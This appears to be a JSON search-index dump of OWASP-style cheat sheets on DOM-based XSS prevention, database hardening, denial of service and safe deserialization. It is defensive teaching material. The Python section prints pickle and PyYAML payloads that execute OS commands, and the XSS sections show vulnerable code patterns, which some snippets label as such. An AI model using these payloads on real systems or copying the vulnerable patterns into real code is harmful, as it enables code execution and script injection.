The guidelines below are an attempt to help developers of web-based JavaScript applications (Web 2.0) avoid XSS.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-1-untrusted-data-should-only-be-treated-as-displayable-text","title":"GUIDELINE #1 - Untrusted data should only be treated as displayable text","text":"

Avoid treating untrusted data as code or markup within JavaScript code.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-2-always-javascript-encode-and-delimit-untrusted-data-as-quoted-strings-when-entering-the-application-when-building-templated-javascript","title":"GUIDELINE #2 - Always JavaScript encode and delimit untrusted data as quoted strings when entering the application when building templated JavaScript","text":"

Always JavaScript encode and delimit untrusted data as quoted strings when entering the application as illustrated in the following example.

var x = \"<%= Encode.forJavaScript(untrustedData) %>\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-3-use-documentcreateelement-elementsetattributevalue-elementappendchild-and-similar-to-build-dynamic-interfaces","title":"GUIDELINE #3 - Use document.createElement(\"...\"), element.setAttribute(\"...\",\"value\"), element.appendChild(...) and similar to build dynamic interfaces","text":"

document.createElement(\"...\"), element.setAttribute(\"...\",\"value\"), element.appendChild(...) and similar are safe ways to build dynamic interfaces.

Please note, element.setAttribute is only safe for a limited number of attributes.

Dangerous attributes include any attribute that is a command execution context, such as onclick or onblur.

Examples of safe attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width.
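
A minimal sketch of this guideline (the variable names and the userList element are illustrative): the structure is built with DOM APIs, static values go into attributes from the safe list above, and untrusted data is only ever assigned as text.

var item = document.createElement('li');\nitem.setAttribute('class', 'user-item'); // static value in a safe attribute\nitem.textContent = untrustedDisplayName; // untrusted data is treated as text only\ndocument.getElementById('userList').appendChild(item);\n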

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-4-avoid-sending-untrusted-data-into-html-rendering-methods","title":"GUIDELINE #4 - Avoid sending untrusted data into HTML rendering methods","text":"

Avoid populating the following methods with untrusted data.

  1. element.innerHTML = \"...\";
  2. element.outerHTML = \"...\";
  3. document.write(...);
  4. document.writeln(...);
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-5-avoid-the-numerous-methods-which-implicitly-eval-data-passed-to-it","title":"GUIDELINE #5 - Avoid the numerous methods which implicitly eval() data passed to it","text":"

There are numerous methods which implicitly eval() data passed to them; these must be avoided.

Make sure that any untrusted data passed to these methods is:

  1. Delimited with string delimiters
  2. Enclosed within a closure or JavaScript encoded to N-levels based on usage
  3. Wrapped in a custom function.

Follow step 3 above to make sure that the untrusted data is not sent to dangerous methods within the custom function, or handle it by adding an extra layer of encoding.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#utilizing-an-enclosure-as-suggested-by-gaz","title":"Utilizing an Enclosure (as suggested by Gaz)","text":"

The example that follows illustrates using closures to avoid double JavaScript encoding.

 var ESAPI = require('node-esapi');\nsetTimeout((function(param) { return function() {\ncustomFunction(param);\n}\n})(\"<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>\"), y);\n

The other alternative is using N-levels of encoding.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#n-levels-of-encoding","title":"N-Levels of Encoding","text":"

If your code looked like the following, you would need to only double JavaScript encode input data.

setTimeout(\"customFunction('<%=doubleJavaScriptEncodedData%>', y)\");\nfunction customFunction (firstName, lastName)\nalert(\"Hello\" + firstName + \" \" + lastNam);\n}\n

The doubleJavaScriptEncodedData has its first layer of JavaScript encoding reversed (upon execution) in the single quotes.

Then the implicit eval of setTimeout reverses another layer of JavaScript encoding to pass the correct value to customFunction.

The reason why you only need to double JavaScript encode is that the customFunction function did not itself pass the input to another method which implicitly or explicitly called eval(). If firstName were passed to another JavaScript method which implicitly or explicitly called eval(), then <%=doubleJavaScriptEncodedData%> above would need to be changed to <%=tripleJavaScriptEncodedData%>.

An important implementation note is that if the JavaScript code tries to utilize the double or triple encoded data in string comparisons, the value may be interpreted as different values based on the number of evals() the data has passed through before being passed to the if comparison and the number of times the value was JavaScript encoded.

If A is double JavaScript encoded then the following if check will return false.

 var x = \"doubleJavaScriptEncodedA\";  //\\u005c\\u0075\\u0030\\u0030\\u0034\\u0031\nif (x == \"A\") {\nalert(\"x is A\");\n} else if (x == \"\\u0041\") {\nalert(\"This is what pops\");\n}\n

This brings up an interesting design point. Ideally, the correct way to apply encoding and avoid the problem stated above is to server-side encode for the output context where data is introduced into the application.

Then client-side encode (using a JavaScript encoding library such as node-esapi) for the individual subcontext (DOM methods) which untrusted data is passed to.

Here are some examples of how they are used:

//server-side encoding\nvar ESAPI = require('node-esapi');\nvar input = \"<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>\";\n
//HTML encoding is happening in JavaScript\nvar ESAPI = require('node-esapi');\ndocument.writeln(ESAPI.encoder().encodeForHTML(input));\n

One option is to utilize ECMAScript 5 immutable properties in the JavaScript library. Another option, provided by Gaz (Gareth), was to use a specific code construct to limit mutability with anonymous closures.

An example follows:

function escapeHTML(str) {\nstr = str + \"\"; // coerce the input to a string\nvar out = \"\";\nfor(var i=0; i<str.length; i++) {\nif(str[i] === '&') {\nout += '&amp;';\n} else if(str[i] === '<') {\nout += '&lt;';\n} else if(str[i] === '>') {\nout += '&gt;';\n} else if(str[i] === \"'\") {\nout += '&#39;';\n} else if(str[i] === '\"') {\nout += '&quot;';\n} else {\nout += str[i];\n}\n}\nreturn out;\n}\n
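
The first option above (ECMAScript 5 immutable properties) can be sketched as follows; this is illustrative only and is not part of the cheat sheet's ESAPI examples. Freezing the encoder object prevents later scripts from silently replacing the encoding function.

var encoder = {\nencodeForHTML: escapeHTML // reuse the escapeHTML function defined above\n};\n// ECMAScript 5 Object.freeze makes the properties non-writable and non-configurable.\nObject.freeze(encoder);\nencoder.encodeForHTML = function(s) { return s; }; // ignored (throws a TypeError in strict mode)\nelement.innerHTML = encoder.encodeForHTML(untrustedData);\n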
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-6-use-untrusted-data-on-only-the-right-side-of-an-expression","title":"GUIDELINE #6 - Use untrusted data on only the right side of an expression","text":"

Use untrusted data on only the right side of an expression, especially data that looks like code and may be passed to the application (e.g., location and eval()).

window[userDataOnLeftSide] = \"userDataOnRightSide\";\n

Using untrusted user data on the left side of the expression allows an attacker to subvert internal and external attributes of the window object, whereas using user input on the right side of the expression doesn't allow direct manipulation.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-7-when-url-encoding-in-dom-be-aware-of-character-set-issues","title":"GUIDELINE #7 - When URL encoding in DOM be aware of character set issues","text":"

When URL encoding in the DOM, be aware of character set issues, as the character set in the JavaScript DOM is not clearly defined (Mike Samuel).
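
In practice, this usually means preferring encodeURIComponent, which always encodes using UTF-8, over the legacy escape function, whose handling of non-ASCII characters is inconsistent (it emits non-standard %uXXXX sequences). A brief illustration, with untrustedSearchTerm as a placeholder:

// escape() is deprecated and handles non-ASCII characters inconsistently - avoid it.\n// encodeURIComponent() always uses UTF-8, giving consistent results across browsers.\nvar query = 'https://example.com/search?q=' + encodeURIComponent(untrustedSearchTerm);\nwindow.location.href = query;\n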

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-8-limit-access-to-object-properties-when-using-objectx-accessors","title":"GUIDELINE #8 - Limit access to object properties when using object[x] accessors","text":"

Limit access to object properties when using object[x] accessors (Mike Samuel). In other words, add a level of indirection between untrusted input and specified object properties.

Here is an example of the problem using map types:

var myMapType = {};\nmyMapType[<%=untrustedData%>] = \"moreUntrustedData\";\n

The developer writing the code above was trying to add additional keyed elements to the myMapType object. However, this could be used by an attacker to subvert internal and external attributes of the myMapType object.

A better approach would be to use the following:

if (untrustedData === 'location') {\nmyMapType.location = \"moreUntrustedData\";\n}\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-9-run-your-javascript-in-a-ecmascript-5-canopy-or-sandbox","title":"GUIDELINE #9 - Run your JavaScript in a ECMAScript 5 canopy or sandbox","text":"

Run your JavaScript in an ECMAScript 5 canopy or sandbox to make it harder for your JavaScript API to be compromised (Gareth Heyes and John Stevens).

Examples of some JavaScript sandbox / sanitizers:

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-10-dont-eval-json-to-convert-it-to-native-javascript-objects","title":"GUIDELINE #10 - Don't eval() JSON to convert it to native JavaScript objects","text":"

Don't eval() JSON to convert it to native JavaScript objects. Instead use JSON.parse() (with JSON.stringify() as the standard counterpart for serializing) (Chris Schmidt).
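
A minimal illustration, assuming untrustedJsonText holds a JSON string received from the network:

// DO NOT: eval() executes any code embedded in the payload.\n// var settings = eval('(' + untrustedJsonText + ')');\n\n// DO: JSON.parse() only builds data (objects, arrays, strings, numbers, booleans, null).\nvar settings = JSON.parse(untrustedJsonText);\n\n// JSON.stringify() is the standard counterpart for serializing.\nvar serialized = JSON.stringify(settings);\n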

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#common-problems-associated-with-mitigating-dom-based-xss","title":"Common Problems Associated with Mitigating DOM Based XSS","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#complex-contexts","title":"Complex Contexts","text":"

In many cases the context isn't straightforward to discern.

<a href=\"javascript:myFunction('<%=untrustedData%>', 'test');\">Click Me</a>\n ...\n<script>\nFunction myFunction (url,name) {\nwindow.location = url;\n}\n</script>\n

In the above example, untrusted data started in the rendering URL context (href attribute of an a tag) then changed to a JavaScript execution context (javascript: protocol handler) which passed the untrusted data to an execution URL subcontext (window.location of myFunction).

Because the data was introduced in JavaScript code and passed to a URL subcontext the appropriate server-side encoding would be the following:

<a href=\"javascript:myFunction('<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(untrustedData)) %>', 'test');\">\nClick Me</a>\n ...\n

Or if you were using ECMAScript 5 with an immutable JavaScript client-side encoding library, you could do the following:

<!-- server side URL encoding has been removed.  Now only JavaScript encoding on server side. -->\n<a href=\"javascript:myFunction('<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>', 'test');\">Click Me</a>\n ...\n<script>\nfunction myFunction (url,name) {\nvar encodedURL = ESAPI.encoder().encodeForURL(url);  //URL encoding using client-side scripts\nwindow.location = encodedURL;\n}\n</script>\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#inconsistencies-of-encoding-libraries","title":"Inconsistencies of Encoding Libraries","text":"

There are a number of open source encoding libraries out there:

  1. OWASP ESAPI
  2. OWASP Java Encoder
  3. Apache Commons Text StringEscapeUtils (replaces the one from Apache Commons Lang3)
  4. Jtidy
  5. Your company's custom implementation.

Some work on a block list while others ignore important characters like \"<\" and \">\".

Java Encoder is an active project providing support for HTML, CSS and JavaScript encoding.

ESAPI is one of the few which works on an allow list and encodes all non-alphanumeric characters. It is important to use an encoding library that understands which characters can be used to exploit vulnerabilities in their respective contexts. Misconceptions abound related to the proper encoding that is required.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#encoding-misconceptions","title":"Encoding Misconceptions","text":"

Many security training curriculums and papers advocate the blind usage of HTML encoding to resolve XSS.

This logically seems to be prudent advice as the JavaScript parser does not understand HTML encoding.

However, if the pages returned from your web application utilize a content type of text/xhtml or the file type extension of *.xhtml then HTML encoding may not work to mitigate against XSS.

For example:

<script>\n&#x61;lert(1);\n</script>\n

The HTML encoded value above is still executable. If that isn't enough to keep in mind, you have to remember that encodings are lost when you retrieve them using the value attribute of a DOM element.

Let's look at the sample page and script:

<form name=\"myForm\" ...>\n  <input type=\"text\" name=\"lName\" value=\"<%=ESAPI.encoder().encodeForHTML(last_name)%>\">\n ...\n</form>\n<script>\nvar x = document.myForm.lName.value;  //when the value is retrieved the encoding is reversed\ndocument.writeln(x);  //any code passed into lName is now executable.\n</script>\n

Finally there is the problem that certain methods in JavaScript which are usually safe can be unsafe in certain contexts.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#usually-safe-methods","title":"Usually Safe Methods","text":"

One example of an attribute which is thought to be safe is innerText.

Some papers or guides advocate its use as an alternative to innerHTML to mitigate against XSS in innerHTML. However, depending on the tag to which innerText is applied, code can be executed.

<script>\nvar tag = document.createElement(\"script\");\ntag.innerText = \"<%=untrustedData%>\";  //executes code\n</script>\n

The innerText feature was originally introduced by Internet Explorer, and was formally specified in the HTML standard in 2016 after being adopted by all major browser vendors.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#detect-dom-xss-using-variant-analysis","title":"Detect DOM XSS using variant analysis","text":"

Vulnerable code:

<script>\nvar x = location.hash.split(\"#\")[1];\ndocument.write(x);\n</script>\n

A Semgrep rule can be used to identify the above DOM XSS pattern (see the linked rule).

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html","title":"Database Security Cheat Sheet","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance on securely configuring and using SQL and NoSQL databases. It is intended to be used by application developers when they are responsible for managing the databases, in the absence of a dedicated database administrator (DBA). For details about protecting against SQL Injection attacks, see the SQL Injection Prevention Cheat Sheet.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#connecting-to-the-database","title":"Connecting to the Database","text":"

The backend database used by the application should be isolated as much as possible, in order to prevent malicious or undesirable users from being able to connect to it. Exactly how this is achieved will depend on the system and network architecture. The following options could be used to protect it:

Similar protection should be implemented to protect any web-based management tools used with the database, such as phpMyAdmin.

When an application is running on an untrusted system (such as a thick-client), it should always connect to the backend through an API that can enforce appropriate access control and restrictions. Direct connections should never be made from a thick client to the backend database.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#transport-layer-protection","title":"Transport Layer Protection","text":"

Most databases will allow unencrypted network connections in their default configurations. Although some will encrypt the initial authentication (such as Microsoft SQL Server), the rest of the traffic will be unencrypted, meaning that all kinds of sensitive information will be sent across the network in clear text. The following steps should be taken to prevent unencrypted traffic:

The Transport Layer Protection and TLS Cipher String Cheat Sheets contain further guidance on securely configuring TLS.
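
As an illustration only (the cheat sheet does not prescribe a specific driver, and option names vary between databases), a Node.js application using the node-postgres (pg) client can require TLS and certificate verification when connecting:

const { Client } = require('pg'); // node-postgres, shown purely as an example driver\n\nconst client = new Client({\nhost: 'db.internal.example.com',\ndatabase: 'appdb',\nuser: 'app_user',\npassword: process.env.DB_PASSWORD, // never hardcode credentials\nssl: {\nrejectUnauthorized: true // refuse the connection if the server certificate cannot be verified\n// ca: fs.readFileSync('/etc/ssl/certs/internal-ca.pem').toString() // optionally pin an internal CA\n}\n});\n\nclient.connect();\n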

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#authentication","title":"Authentication","text":"

The database should be configured to always require authentication, including connections from the local server. Database accounts should be:

As with any system that has its own user accounts, the usual account management processes should be followed, including:

For Microsoft SQL Server, consider the use of Windows or Integrated Authentication, which uses existing Windows accounts rather than SQL Server accounts. This also removes the requirement to store credentials in the application, as it will connect using the credentials of the Windows user it is running under. The Windows Native Authentication Plugin provides similar functionality for MySQL.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#storing-database-credentials","title":"Storing Database Credentials","text":"

Database credentials should never be stored in the application source code, especially if they are unencrypted. Instead, they should be stored in a configuration file that:

Where possible, these credentials should also be encrypted or otherwise protected using built-in functionality, such as the web.config encryption available in ASP.NET.
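
As a minimal Node.js sketch of this idea (illustrative only; the cheat sheet does not mandate a particular mechanism), the credentials are read at runtime from environment variables populated by the deployment environment, so they never appear in the source tree:

// config.js - credentials come from the environment, never from source code or version control\nmodule.exports = {\ndb: {\nhost: process.env.DB_HOST,\nuser: process.env.DB_USER,\npassword: process.env.DB_PASSWORD // injected at deploy time, e.g. from a secrets manager\n}\n};\n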

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#permissions","title":"Permissions","text":"

The permissions assigned to database user accounts should be based on the principle of least privilege (i.e., the accounts should only have the minimal permissions required for the application to function). This can be applied at a number of increasingly granular levels, depending on the functionality available in the database. The following steps should be applicable to all environments:

For more security-critical applications, it is possible to apply permissions at more granular levels, including:

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#database-configuration-and-hardening","title":"Database Configuration and Hardening","text":"

The underlying operating system for the database server should be hardened in the same way as any other server, based on a secure baseline such as the CIS Benchmarks or the Microsoft Security Baselines.

The database application should also be properly configured and hardened. The following principles should apply to any database application and platform:

The following sections give some further recommendations for specific database software, in addition to the more general recommendations given above.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#microsoft-sql-server","title":"Microsoft SQL Server","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#mysql-and-mariadb","title":"MySQL and MariaDB","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#postgresql","title":"PostgreSQL","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#mongodb","title":"MongoDB","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#redis","title":"Redis","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html","title":"Denial of Service Cheat Sheet","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is focused on providing an overall, straight-to-the-point overview with informative guidance on how to battle denial of service (DoS) attacks on different layers. It is by no means complete; however, it should serve as an indicator to inform the reader and to introduce a workable methodology to tackle this issue.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#fundamentals","title":"Fundamentals","text":"

Considering that anti-DoS approaches are not one-step solutions, it becomes apparent that implementing them requires involving different profiles within your organization to assess the actual situation and to apply countermeasures accordingly. These profiles are: developers and architects in the areas of application and infrastructure.

Key concepts within information security revolve around criteria or properties such as the CIA triad. The letter A, which stands for availability, is our focal point. The core essence of a DoS attack is to affect, by any means, the availability of instances or objects and to eventually render them inaccessible. Thus, for any information system to serve its purpose, it must be available at any time, and every computing system within the interoperability flow must function correctly to achieve that.

To remain resilient and resistant, it is imperative to outline and to conduct a thorough analysis of the components within your inventory based on functionality, architecture and performance (i.e. application-wise, infrastructure and network related).

The outcome of this research should identify potential causes of a DoS and highlight single points of failure, ranging from programming related errors to resource exhaustion.

From a prevention point of view, it's important to have a clear picture on how to tackle your appropriate components to address the issue at stake (e.g. bottlenecks, etc.). That's why a solid understanding of your environment is essential to develop a suitable defence mechanism. These could be aligned with:

  1. scaling options (up = inner hardware components, out = the number of complete components)
  2. existing conceptual / logical techniques (such as applying redundancy measurements, bulk-heading, etc. - which expands your in-house capabilities)
  3. a cost analysis applied to your situation

Within this document we will adhere to a particular guidance structure to illustrate how to analyse this subject based on your situation. It is by no means a complete approach, but it aims to provide fundamental building blocks which should be utilized to assist you in constructing anti-DoS concepts fitting your needs.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#general-categories-and-basic-controls","title":"General Categories and Basic Controls","text":"

In this cheat sheet, we will adhere to the DDoS classification as documented by CERT-EU. The document categorizes the 7 OSI model layers into three main attack categories, namely application, session and network.

TODO: Add Diagram

Application attacks focus on rendering applications unavailable by exhausting resources or by making it unusable in a functional way. Session (or protocol) attacks focus on consuming server resources, or resources of intermediary equipment like firewalls and load-balancers. Network (or volumetric) attacks focus on saturating the bandwidth of the network resource. It is important to understand that each of these three attack categories needs to be considered when designing a DoS resilient solution.

Note that OSI model layers 1 and 2 are not included in this categorization. In the spirit of providing a complete overview of all DoS types of attacks, we will shortly discuss these layers and how DoS applies to them.

The physical layer consists of the networking hardware transmission technologies of a network. It is a fundamental layer underlying the logical data structures of the higher-level functions in a network. Typical DoS scenarios are destruction, obstruction, malfunction. An example is a case where a Georgian elderly woman sliced through an underground cable, resulting in loss of internet for the whole of Armenia.

The data link layer is the protocol layer that transfers data between adjacent network nodes in a wide area network (WAN) or between nodes on the same local area network (LAN) segment. Typical DoS scenarios are MAC flooding (targeting switch MAC tables) and ARP poisoning.

In MAC flooding attacks, a switch is flooded with packets, each with a different source MAC address. The intention is to consume the limited memory used by a switch to store the MAC-to-physical-port translation table (MAC table). The result is that valid MAC addresses are purged and the switch enters a fail-over mode where it acts as a network hub. All data is then forwarded to all ports, resulting in data leakage. TODO impact in relation to DoS TODO document compact remediation

In ARP poisoning attacks a malicious actor sends spoofed ARP (Address Resolution Protocol) messages over the wire. The result is that the attacker's MAC address can be linked to the IP address of a legitimate device on the network. This allows an attacker to intercept, modify or stop data in transit, that was intended for the victim IP address. The ARP protocol is specific to the local area network and could cause a DoS on the wire communication.

Packet filtering technology can be used to inspect packets in transit to identify and block offending ARP packets. Another approach is to use static ARP tables, but they prove difficult to maintain.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#application-attacks","title":"Application attacks","text":"

Application layer attacks focus on rendering applications unavailable by exhausting resources or by making them unusable in a functional way. These attacks do not have to consume the network bandwidth to be effective. Rather, they place an operational strain on the application server in such a way that the server becomes unavailable, unusable or non-functional. All attacks exploiting weaknesses on the OSI layer 7 protocol stack are generally categorised as application attacks. They are the most challenging to identify and mitigate.

TODO: List all attacks per category. Because we cannot map remediations one on one with an attack vector, we will first need to list them before discussing the action points

Slow HTTP is a DoS attack type where HTTP requests are sent very slowly and fragmented, one at a time. Until the HTTP request is fully delivered, the server will keep resources stalled while waiting for the missing incoming data. At some point, the server will reach the maximum concurrent connection pool, resulting in a DoS. From an attacker's perspective, slow HTTP attacks are cheap to perform because they require minimal resources.
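
At the application-server level, one common mitigation (shown here as a Node.js sketch; the exact settings depend on your server or reverse proxy) is to bound how long a client may take to deliver its headers and body, so slow, fragmented requests cannot hold connection slots open indefinitely:

const http = require('http');\n\nconst server = http.createServer((req, res) => {\nres.end('ok');\n});\n\n// Bound how long a client may take to deliver the request.\nserver.headersTimeout = 10000; // at most 10 seconds to receive the complete headers\nserver.requestTimeout = 30000; // at most 30 seconds to receive the complete request\nserver.keepAliveTimeout = 5000; // close idle keep-alive connections after 5 seconds\n\nserver.listen(8080);\n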

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#software-design-concepts","title":"Software Design Concepts","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#session","title":"Session","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#input-validation","title":"Input validation","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#access-control","title":"Access control","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#network-attacks","title":"Network attacks","text":"

TODO: (Develop text) Attacks where network bandwidth gets saturation. Volumetric in nature. Amplification techniques make these attacks effective.

TODO: (list attacks) NTP amplification, DNS amplification, UDP flooding, TCP flooding

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#network-design-concepts","title":"Network Design Concepts","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#rate-limiting","title":"Rate limiting","text":"

Rate limiting is the process of controlling the rate of traffic from and to a server or component. It can be implemented on the infrastructure as well as on the application level. Rate limiting can be based on (offending) IPs, on IP block lists, on geolocation, etc.
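
As an application-level illustration only (rate limiting at a reverse proxy, WAF or CDN is usually preferable), the following Express-style middleware implements a minimal fixed-window per-IP limiter; the limits and the in-memory store are purely illustrative and would neither survive restarts nor scale across instances:

// At most LIMIT requests per client IP within each WINDOW_MS window.\nconst WINDOW_MS = 60 * 1000;\nconst LIMIT = 100;\nconst hits = new Map(); // ip -> { count, windowStart }\n\nfunction rateLimit(req, res, next) {\nconst now = Date.now();\nconst entry = hits.get(req.ip) || { count: 0, windowStart: now };\nif (now - entry.windowStart > WINDOW_MS) {\nentry.count = 0;\nentry.windowStart = now;\n}\nentry.count += 1;\nhits.set(req.ip, entry);\nif (entry.count > LIMIT) {\nres.statusCode = 429; // Too Many Requests\nreturn res.end('Too many requests');\n}\nnext();\n}\n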

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#isp-level-remediations","title":"ISP-Level remediations","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#global-level-remediations-commercial-cloud-filter-services","title":"Global-Level remediations: Commercial cloud filter services","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html","title":"Deserialization Cheat Sheet","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, actionable guidance for safely deserializing untrusted data in your applications.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#what-is-deserialization","title":"What is Deserialization","text":"

Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them for storage, or to send as part of communications.

Deserialization is the reverse of that process, taking data structured in some format, and rebuilding it into an object. Today, the most popular data format for serializing data is JSON. Before that, it was XML.

However, many programming languages have native ways to serialize objects. These native formats usually offer more features than JSON or XML, including customizability of the serialization process.

Unfortunately, the features of these native deserialization mechanisms can sometimes be repurposed for malicious effect when operating on untrusted data. Attacks against deserializers have been found to allow denial-of-service, access-control bypass, and remote code execution (RCE) attacks.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#guidance-on-deserializing-objects-safely","title":"Guidance on Deserializing Objects Safely","text":"

The following language-specific guidance attempts to enumerate safe methodologies for deserializing data that can't be trusted.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#php","title":"PHP","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review","title":"WhiteBox Review","text":"

Check the use of unserialize() function and review how the external parameters are accepted. Use a safe, standard data interchange format such as JSON (via json_decode() and json_encode()) if you need to pass serialized data to the user.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#python","title":"Python","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review","title":"BlackBox Review","text":"

If the traffic data ends with the dot symbol ., it is very likely that the data was sent in a serialized (pickle) form.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_1","title":"WhiteBox Review","text":"

The following APIs in Python can be vulnerable to serialization attacks. Search the code for the patterns below.

  1. The uses of pickle/c_pickle/_pickle with load/loads:
import pickle\ndata = \"\"\" cos.system(S'dir')tR. \"\"\"\npickle.loads(data)\n
  2. Uses of PyYAML with load:
import yaml\ndocument = \"!!python/object/apply:os.system ['ipconfig']\"\nprint(yaml.load(document))\n
  3. Uses of jsonpickle with encode or store methods.
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#java","title":"Java","text":"

The following techniques are all good for preventing attacks against Java's Serializable format.

Implementation advice:

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_2","title":"WhiteBox Review","text":"

Be aware of the following Java API uses for potential serialization vulnerabilities.

1. XMLDecoder with external user defined parameters

2. XStream with fromXML method (XStream version <= v1.4.6 is vulnerable to the serialization issue)

3. ObjectInputStream with readObject

4. Uses of readObject, readObjectNoData, readResolve or readExternal

5. ObjectInputStream.readUnshared

6. Serializable

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review_1","title":"BlackBox Review","text":"

If the captured traffic data includes the following patterns, it may suggest that the data was sent in Java serialization streams:

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#prevent-data-leakage-and-trusted-field-clobbering","title":"Prevent Data Leakage and Trusted Field Clobbering","text":"

If there are data members of an object that should never be controlled by end users during deserialization or exposed to users during serialization, they should be declared with the transient keyword (see the section Protecting Sensitive Information).

For a class that is defined as Serializable, any sensitive information variable should be declared as private transient.

For example, in the class myAccount below, the variables 'profit' and 'margin' are declared transient to prevent them from being serialized:

public class myAccount implements Serializable\n{\nprivate transient double profit; // declared transient\n\nprivate transient double margin; // declared transient\n....\n
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#prevent-deserialization-of-domain-objects","title":"Prevent Deserialization of Domain Objects","text":"

Some of your application objects may be forced to implement Serializable due to their hierarchy. To guarantee that your application objects can't be deserialized, a readObject() method should be declared (with a final modifier) which always throws an exception:

private final void readObject(ObjectInputStream in) throws java.io.IOException {\nthrow new java.io.IOException(\"Cannot be deserialized\");\n}\n
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#harden-your-own-javaioobjectinputstream","title":"Harden Your Own java.io.ObjectInputStream","text":"

The java.io.ObjectInputStream class is used to deserialize objects. It's possible to harden its behavior by subclassing it. This is the best solution if:

The general idea is to override ObjectInputStream's resolveClass() method in order to restrict which classes are allowed to be deserialized.

Because this call happens before a readObject() is called, you can be sure that no deserialization activity will occur unless the type is one that you allow.

A simple example is shown here, where the LookAheadObjectInputStream class is guaranteed to not deserialize any other type besides the Bicycle class:

public class LookAheadObjectInputStream extends ObjectInputStream {\n\npublic LookAheadObjectInputStream(InputStream inputStream) throws IOException {\nsuper(inputStream);\n}\n\n/**\n    * Only deserialize instances of our expected Bicycle class\n    */\n@Override\nprotected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {\nif (!desc.getName().equals(Bicycle.class.getName())) {\nthrow new InvalidClassException(\"Unauthorized deserialization attempt\", desc.getName());\n}\nreturn super.resolveClass(desc);\n}\n}\n

More complete implementations of this approach have been proposed by various community members:

